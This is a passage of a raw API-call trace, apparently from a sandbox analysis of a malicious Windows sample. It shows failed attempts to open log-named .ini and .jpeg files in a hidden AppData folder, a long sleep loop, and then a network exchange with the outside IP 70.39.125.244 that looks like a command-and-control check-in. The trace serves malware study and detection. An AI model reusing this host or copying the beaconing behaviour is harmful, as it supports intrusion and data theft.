FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.531] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0217.531] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9480) returned 1 [0217.531] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.532] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.532] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0217.532] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0217.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.532] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.532] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0217.532] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f76b0) returned 1 [0217.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.532] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.532] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0217.532] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0217.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.532] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.532] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0217.532] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9480) returned 1 [0217.533] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.533] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.533] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0217.533] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9480) returned 1 [0217.533] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.533] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.533] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0217.533] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9480) returned 1 [0217.533] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0217.533] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0217.533] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0217.533] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0217.533] Sleep (dwMilliseconds=0x7d0) [0217.535] Sleep (dwMilliseconds=0x7d0) [0217.536] Sleep (dwMilliseconds=0x7d0) [0217.538] Sleep (dwMilliseconds=0x7d0) [0217.540] Sleep (dwMilliseconds=0x7d0) [0217.541] Sleep (dwMilliseconds=0x7d0) [0217.543] Sleep (dwMilliseconds=0x7d0) [0217.544] Sleep (dwMilliseconds=0x7d0) [0217.546] Sleep (dwMilliseconds=0x7d0) [0217.548] Sleep (dwMilliseconds=0x7d0) [0217.551] Sleep (dwMilliseconds=0x7d0) [0217.552] Sleep (dwMilliseconds=0x7d0) [0217.554] Sleep (dwMilliseconds=0x7d0) [0217.555] Sleep (dwMilliseconds=0x7d0) [0217.557] Sleep (dwMilliseconds=0x7d0) [0217.558] Sleep (dwMilliseconds=0x7d0) [0217.560] Sleep (dwMilliseconds=0x7d0) [0217.561] Sleep (dwMilliseconds=0x7d0) [0217.563] Sleep (dwMilliseconds=0x7d0) [0217.565] Sleep (dwMilliseconds=0x7d0) [0217.566] Sleep (dwMilliseconds=0x7d0) [0217.568] Sleep (dwMilliseconds=0x7d0) [0217.569] Sleep (dwMilliseconds=0x7d0) [0217.570] Sleep (dwMilliseconds=0x7d0) [0217.572] Sleep (dwMilliseconds=0x7d0) [0217.574] Sleep (dwMilliseconds=0x7d0) [0217.576] Sleep (dwMilliseconds=0x7d0) [0217.577] Sleep (dwMilliseconds=0x7d0) [0217.579] Sleep (dwMilliseconds=0x7d0) [0217.580] Sleep (dwMilliseconds=0x7d0) [0217.581] Sleep (dwMilliseconds=0x7d0) [0217.583] Sleep (dwMilliseconds=0x7d0) [0217.585] Sleep (dwMilliseconds=0x7d0) [0217.587] Sleep (dwMilliseconds=0x7d0) [0217.588] Sleep (dwMilliseconds=0x7d0) [0217.589] Sleep (dwMilliseconds=0x7d0) [0217.591] Sleep (dwMilliseconds=0x7d0) [0217.593] Sleep (dwMilliseconds=0x7d0) [0217.595] Sleep (dwMilliseconds=0x7d0) [0217.596] Sleep (dwMilliseconds=0x7d0) [0217.598] Sleep (dwMilliseconds=0x7d0) [0217.599] Sleep (dwMilliseconds=0x7d0) [0217.601] Sleep (dwMilliseconds=0x7d0) [0217.602] Sleep (dwMilliseconds=0x7d0) [0217.603] Sleep (dwMilliseconds=0x7d0) [0217.606] Sleep (dwMilliseconds=0x7d0) [0217.607] Sleep (dwMilliseconds=0x7d0) [0217.608] Sleep (dwMilliseconds=0x7d0) [0217.610] Sleep (dwMilliseconds=0x7d0) [0217.611] Sleep (dwMilliseconds=0x7d0) [0217.613] Sleep (dwMilliseconds=0x7d0) [0217.614] Sleep (dwMilliseconds=0x7d0) [0217.617] Sleep (dwMilliseconds=0x7d0) [0217.618] Sleep (dwMilliseconds=0x7d0) [0217.620] Sleep (dwMilliseconds=0x7d0) [0217.621] Sleep (dwMilliseconds=0x7d0) [0217.623] Sleep (dwMilliseconds=0x7d0) [0217.624] Sleep (dwMilliseconds=0x7d0) [0217.626] Sleep (dwMilliseconds=0x7d0) [0217.629] Sleep (dwMilliseconds=0x7d0) [0217.630] Sleep (dwMilliseconds=0x7d0) [0217.631] Sleep (dwMilliseconds=0x7d0) [0217.633] Sleep (dwMilliseconds=0x7d0) [0217.635] Sleep (dwMilliseconds=0x7d0) [0217.637] Sleep (dwMilliseconds=0x7d0) [0217.640] Sleep (dwMilliseconds=0x7d0) [0217.641] Sleep (dwMilliseconds=0x7d0) [0217.642] Sleep (dwMilliseconds=0x7d0) [0217.646] Sleep (dwMilliseconds=0x7d0) [0217.652] Sleep (dwMilliseconds=0x7d0) [0217.654] Sleep (dwMilliseconds=0x7d0) [0217.655] Sleep (dwMilliseconds=0x7d0) [0217.659] Sleep (dwMilliseconds=0x7d0) [0217.662] Sleep (dwMilliseconds=0x7d0) [0217.664] Sleep (dwMilliseconds=0x7d0) [0217.665] Sleep (dwMilliseconds=0x7d0) [0217.667] Sleep (dwMilliseconds=0x7d0) [0217.668] Sleep (dwMilliseconds=0x7d0) [0217.670] Sleep (dwMilliseconds=0x7d0) [0217.672] Sleep (dwMilliseconds=0x7d0) [0217.674] Sleep (dwMilliseconds=0x7d0) [0217.676] Sleep (dwMilliseconds=0x7d0) [0217.677] Sleep (dwMilliseconds=0x7d0) [0217.679] Sleep (dwMilliseconds=0x7d0) [0217.680] Sleep (dwMilliseconds=0x7d0) [0217.682] Sleep (dwMilliseconds=0x7d0) [0217.684] Sleep (dwMilliseconds=0x7d0) [0217.686] Sleep (dwMilliseconds=0x7d0) [0217.687] Sleep (dwMilliseconds=0x7d0) [0217.689] Sleep (dwMilliseconds=0x7d0) [0217.690] Sleep (dwMilliseconds=0x7d0) [0217.692] Sleep (dwMilliseconds=0x7d0) [0217.695] Sleep (dwMilliseconds=0x7d0) [0217.696] Sleep (dwMilliseconds=0x7d0) [0217.698] Sleep (dwMilliseconds=0x7d0) [0217.699] Sleep (dwMilliseconds=0x7d0) [0217.701] Sleep (dwMilliseconds=0x7d0) [0217.702] Sleep (dwMilliseconds=0x7d0) [0217.704] Sleep (dwMilliseconds=0x7d0) [0217.705] Sleep (dwMilliseconds=0x7d0) [0217.707] Sleep (dwMilliseconds=0x7d0) [0217.708] Sleep (dwMilliseconds=0x7d0) [0217.710] Sleep (dwMilliseconds=0x7d0) [0217.711] Sleep (dwMilliseconds=0x7d0) [0217.713] Sleep (dwMilliseconds=0x7d0) [0217.716] Sleep (dwMilliseconds=0x7d0) [0217.717] Sleep (dwMilliseconds=0x7d0) [0217.719] Sleep (dwMilliseconds=0x7d0) [0217.720] Sleep (dwMilliseconds=0x7d0) [0217.722] Sleep (dwMilliseconds=0x7d0) [0217.723] Sleep (dwMilliseconds=0x7d0) [0217.726] Sleep (dwMilliseconds=0x7d0) [0217.728] Sleep (dwMilliseconds=0x7d0) [0217.730] Sleep (dwMilliseconds=0x7d0) [0217.732] Sleep (dwMilliseconds=0x7d0) [0217.733] Sleep (dwMilliseconds=0x7d0) [0217.735] Sleep (dwMilliseconds=0x7d0) [0217.736] Sleep (dwMilliseconds=0x7d0) [0217.738] Sleep (dwMilliseconds=0x7d0) [0217.741] Sleep (dwMilliseconds=0x7d0) [0217.743] Sleep (dwMilliseconds=0x7d0) [0217.745] Sleep (dwMilliseconds=0x7d0) [0217.746] Sleep (dwMilliseconds=0x7d0) [0217.748] Sleep (dwMilliseconds=0x7d0) [0217.750] Sleep (dwMilliseconds=0x7d0) [0217.753] Sleep (dwMilliseconds=0x7d0) [0217.754] Sleep (dwMilliseconds=0x7d0) [0217.756] Sleep (dwMilliseconds=0x7d0) [0217.757] Sleep (dwMilliseconds=0x7d0) [0217.767] Sleep (dwMilliseconds=0x7d0) [0217.769] Sleep (dwMilliseconds=0x7d0) [0217.772] Sleep (dwMilliseconds=0x7d0) [0217.774] Sleep (dwMilliseconds=0x7d0) [0217.795] Sleep (dwMilliseconds=0x7d0) [0217.802] Sleep (dwMilliseconds=0x7d0) [0217.804] Sleep (dwMilliseconds=0x7d0) [0217.805] Sleep (dwMilliseconds=0x7d0) [0217.807] Sleep (dwMilliseconds=0x7d0) [0217.809] Sleep (dwMilliseconds=0x7d0) [0217.811] Sleep (dwMilliseconds=0x7d0) [0217.900] Sleep (dwMilliseconds=0x7d0) [0217.902] Sleep (dwMilliseconds=0x7d0) [0217.904] Sleep (dwMilliseconds=0x7d0) [0217.906] Sleep (dwMilliseconds=0x7d0) [0217.909] Sleep (dwMilliseconds=0x7d0) [0217.910] Sleep (dwMilliseconds=0x7d0) [0217.912] Sleep (dwMilliseconds=0x7d0) [0217.913] Sleep (dwMilliseconds=0x7d0) [0217.915] Sleep (dwMilliseconds=0x7d0) [0217.918] Sleep (dwMilliseconds=0x7d0) [0217.919] Sleep (dwMilliseconds=0x7d0) [0217.921] Sleep (dwMilliseconds=0x7d0) [0217.923] Sleep (dwMilliseconds=0x7d0) [0217.924] Sleep (dwMilliseconds=0x7d0) [0217.926] Sleep (dwMilliseconds=0x7d0) [0217.927] Sleep (dwMilliseconds=0x7d0) [0217.929] Sleep (dwMilliseconds=0x7d0) [0217.932] Sleep (dwMilliseconds=0x7d0) [0217.933] Sleep (dwMilliseconds=0x7d0) [0217.935] Sleep (dwMilliseconds=0x7d0) [0217.936] Sleep (dwMilliseconds=0x7d0) [0217.938] Sleep (dwMilliseconds=0x7d0) [0217.940] Sleep (dwMilliseconds=0x7d0) [0217.942] Sleep (dwMilliseconds=0x7d0) [0217.943] Sleep (dwMilliseconds=0x7d0) [0217.945] Sleep (dwMilliseconds=0x7d0) [0217.946] Sleep (dwMilliseconds=0x7d0) [0217.948] Sleep (dwMilliseconds=0x7d0) [0217.949] Sleep (dwMilliseconds=0x7d0) [0217.951] Sleep (dwMilliseconds=0x7d0) [0217.953] Sleep (dwMilliseconds=0x7d0) [0217.954] Sleep (dwMilliseconds=0x7d0) [0217.956] Sleep (dwMilliseconds=0x7d0) [0217.957] Sleep (dwMilliseconds=0x7d0) [0217.959] Sleep (dwMilliseconds=0x7d0) [0217.961] Sleep (dwMilliseconds=0x7d0) [0217.963] Sleep (dwMilliseconds=0x7d0) [0217.965] Sleep (dwMilliseconds=0x7d0) [0217.966] Sleep (dwMilliseconds=0x7d0) [0217.968] Sleep (dwMilliseconds=0x7d0) [0217.969] Sleep (dwMilliseconds=0x7d0) [0217.971] Sleep (dwMilliseconds=0x7d0) [0217.973] Sleep (dwMilliseconds=0x7d0) [0217.974] Sleep (dwMilliseconds=0x7d0) [0217.976] Sleep (dwMilliseconds=0x7d0) [0217.977] Sleep (dwMilliseconds=0x7d0) [0217.979] Sleep (dwMilliseconds=0x7d0) [0217.980] Sleep (dwMilliseconds=0x7d0) [0217.982] Sleep (dwMilliseconds=0x7d0) [0217.983] Sleep (dwMilliseconds=0x7d0) [0217.985] Sleep (dwMilliseconds=0x7d0) [0217.986] Sleep (dwMilliseconds=0x7d0) [0217.988] Sleep (dwMilliseconds=0x7d0) [0217.989] Sleep (dwMilliseconds=0x7d0) [0217.991] Sleep (dwMilliseconds=0x7d0) [0217.992] Sleep (dwMilliseconds=0x7d0) [0217.997] Sleep (dwMilliseconds=0x7d0) [0217.999] Sleep (dwMilliseconds=0x7d0) [0218.001] Sleep (dwMilliseconds=0x7d0) [0218.002] Sleep (dwMilliseconds=0x7d0) [0218.004] Sleep (dwMilliseconds=0x7d0) [0218.008] Sleep (dwMilliseconds=0x7d0) [0218.010] Sleep (dwMilliseconds=0x7d0) [0218.011] Sleep (dwMilliseconds=0x7d0) [0218.013] Sleep (dwMilliseconds=0x7d0) [0218.014] Sleep (dwMilliseconds=0x7d0) [0218.019] Sleep (dwMilliseconds=0x7d0) [0218.020] Sleep (dwMilliseconds=0x7d0) [0218.023] Sleep (dwMilliseconds=0x7d0) [0218.025] Sleep (dwMilliseconds=0x7d0) [0218.028] Sleep (dwMilliseconds=0x7d0) [0218.029] Sleep (dwMilliseconds=0x7d0) [0218.055] Sleep (dwMilliseconds=0x7d0) [0218.057] Sleep (dwMilliseconds=0x7d0) [0218.058] Sleep (dwMilliseconds=0x7d0) [0218.060] Sleep (dwMilliseconds=0x7d0) [0218.081] Sleep (dwMilliseconds=0x7d0) [0218.082] Sleep (dwMilliseconds=0x7d0) [0218.087] Sleep (dwMilliseconds=0x7d0) [0218.089] Sleep (dwMilliseconds=0x7d0) [0218.090] Sleep (dwMilliseconds=0x7d0) [0218.092] Sleep (dwMilliseconds=0x7d0) [0218.093] Sleep (dwMilliseconds=0x7d0) [0218.094] Sleep (dwMilliseconds=0x7d0) [0218.098] Sleep (dwMilliseconds=0x7d0) [0218.099] Sleep (dwMilliseconds=0x7d0) [0218.101] Sleep (dwMilliseconds=0x7d0) [0218.102] Sleep (dwMilliseconds=0x7d0) [0218.104] Sleep (dwMilliseconds=0x7d0) [0218.105] Sleep (dwMilliseconds=0x7d0) [0218.109] Sleep (dwMilliseconds=0x7d0) [0218.111] Sleep (dwMilliseconds=0x7d0) [0218.112] Sleep (dwMilliseconds=0x7d0) [0218.114] Sleep (dwMilliseconds=0x7d0) [0218.115] Sleep (dwMilliseconds=0x7d0) [0218.117] Sleep (dwMilliseconds=0x7d0) [0218.118] Sleep (dwMilliseconds=0x7d0) [0218.120] Sleep (dwMilliseconds=0x7d0) [0218.122] Sleep (dwMilliseconds=0x7d0) [0218.123] Sleep (dwMilliseconds=0x7d0) [0218.124] Sleep (dwMilliseconds=0x7d0) [0218.126] Sleep (dwMilliseconds=0x7d0) [0218.127] Sleep (dwMilliseconds=0x7d0) [0218.138] Sleep (dwMilliseconds=0x7d0) [0218.154] Sleep (dwMilliseconds=0x7d0) [0218.175] Sleep (dwMilliseconds=0x7d0) [0218.177] Sleep (dwMilliseconds=0x7d0) [0218.178] Sleep (dwMilliseconds=0x7d0) [0218.180] Sleep (dwMilliseconds=0x7d0) [0218.184] Sleep (dwMilliseconds=0x7d0) [0218.186] Sleep (dwMilliseconds=0x7d0) [0218.188] Sleep (dwMilliseconds=0x7d0) [0218.189] Sleep (dwMilliseconds=0x7d0) [0218.191] Sleep (dwMilliseconds=0x7d0) [0218.192] Sleep (dwMilliseconds=0x7d0) [0218.194] Sleep (dwMilliseconds=0x7d0) [0218.195] Sleep (dwMilliseconds=0x7d0) [0218.197] Sleep (dwMilliseconds=0x7d0) [0218.198] Sleep (dwMilliseconds=0x7d0) [0218.200] Sleep (dwMilliseconds=0x7d0) [0218.201] Sleep (dwMilliseconds=0x7d0) [0218.206] Sleep (dwMilliseconds=0x7d0) [0218.208] Sleep (dwMilliseconds=0x7d0) [0218.210] Sleep (dwMilliseconds=0x7d0) [0218.211] Sleep (dwMilliseconds=0x7d0) [0218.216] Sleep (dwMilliseconds=0x7d0) [0218.218] Sleep (dwMilliseconds=0x7d0) [0218.219] Sleep (dwMilliseconds=0x7d0) [0218.221] Sleep (dwMilliseconds=0x7d0) [0218.223] Sleep (dwMilliseconds=0x7d0) [0218.224] Sleep (dwMilliseconds=0x7d0) [0218.226] Sleep (dwMilliseconds=0x7d0) [0218.227] Sleep (dwMilliseconds=0x7d0) [0218.229] Sleep (dwMilliseconds=0x7d0) [0218.231] Sleep (dwMilliseconds=0x7d0) [0218.233] Sleep (dwMilliseconds=0x7d0) [0218.234] Sleep (dwMilliseconds=0x7d0) [0218.239] Sleep (dwMilliseconds=0x7d0) [0218.241] Sleep (dwMilliseconds=0x7d0) [0218.243] Sleep (dwMilliseconds=0x7d0) [0218.244] Sleep (dwMilliseconds=0x7d0) [0218.249] Sleep (dwMilliseconds=0x7d0) [0218.251] Sleep (dwMilliseconds=0x7d0) [0218.253] Sleep (dwMilliseconds=0x7d0) [0218.254] Sleep (dwMilliseconds=0x7d0) [0218.256] Sleep (dwMilliseconds=0x7d0) [0218.257] Sleep (dwMilliseconds=0x7d0) [0218.261] Sleep (dwMilliseconds=0x7d0) [0218.262] Sleep (dwMilliseconds=0x7d0) [0218.264] Sleep (dwMilliseconds=0x7d0) [0218.265] Sleep (dwMilliseconds=0x7d0) [0218.267] Sleep (dwMilliseconds=0x7d0) [0218.268] Sleep (dwMilliseconds=0x7d0) [0218.270] Sleep (dwMilliseconds=0x7d0) [0218.271] Sleep (dwMilliseconds=0x7d0) [0218.273] Sleep (dwMilliseconds=0x7d0) [0218.274] Sleep (dwMilliseconds=0x7d0) [0218.276] Sleep (dwMilliseconds=0x7d0) [0218.278] Sleep (dwMilliseconds=0x7d0) [0218.281] Sleep (dwMilliseconds=0x7d0) [0218.283] Sleep (dwMilliseconds=0x7d0) [0218.284] Sleep (dwMilliseconds=0x7d0) [0218.297] Sleep (dwMilliseconds=0x7d0) [0218.299] Sleep (dwMilliseconds=0x7d0) [0218.300] Sleep (dwMilliseconds=0x7d0) [0218.302] Sleep (dwMilliseconds=0x7d0) [0218.303] Sleep (dwMilliseconds=0x7d0) [0218.305] Sleep (dwMilliseconds=0x7d0) [0218.310] Sleep (dwMilliseconds=0x7d0) [0218.311] Sleep (dwMilliseconds=0x7d0) [0218.313] Sleep (dwMilliseconds=0x7d0) [0218.315] Sleep (dwMilliseconds=0x7d0) [0218.319] Sleep (dwMilliseconds=0x7d0) [0218.321] Sleep (dwMilliseconds=0x7d0) [0218.322] Sleep (dwMilliseconds=0x7d0) [0218.324] Sleep (dwMilliseconds=0x7d0) [0218.325] Sleep (dwMilliseconds=0x7d0) [0218.327] Sleep (dwMilliseconds=0x7d0) [0218.328] Sleep (dwMilliseconds=0x7d0) [0218.330] Sleep (dwMilliseconds=0x7d0) [0218.332] Sleep (dwMilliseconds=0x7d0) [0218.334] Sleep (dwMilliseconds=0x7d0) [0218.335] Sleep (dwMilliseconds=0x7d0) [0218.337] Sleep (dwMilliseconds=0x7d0) [0218.341] Sleep (dwMilliseconds=0x7d0) [0218.343] Sleep (dwMilliseconds=0x7d0) [0218.344] Sleep (dwMilliseconds=0x7d0) [0218.389] Sleep (dwMilliseconds=0x7d0) [0218.399] Sleep (dwMilliseconds=0x7d0) [0218.445] Sleep (dwMilliseconds=0x7d0) [0218.502] Sleep (dwMilliseconds=0x7d0) [0218.638] Sleep (dwMilliseconds=0x7d0) [0218.664] Sleep (dwMilliseconds=0x7d0) [0218.705] Sleep (dwMilliseconds=0x7d0) [0218.769] Sleep (dwMilliseconds=0x7d0) [0218.817] Sleep (dwMilliseconds=0x7d0) [0218.909] Sleep (dwMilliseconds=0x7d0) [0218.954] socket (af=2, type=1, protocol=6) returned 0x1c70 [0218.955] connect (s=0x1c70, name=0x9f923b0*(sa_family=2, sin_port=0x50, sin_addr="70.39.125.244"), namelen=16) returned 0 [0219.124] send (s=0x1c70, buf=0x82e10fa*, len=169, flags=0) returned 169 [0219.124] setsockopt (s=0x1c70, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0219.125] recv (in: s=0x1c70, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 436 [0219.516] closesocket (s=0x1c70) returned 0 [0219.517] Sleep (dwMilliseconds=0x7d0) [0219.545] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.545] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: 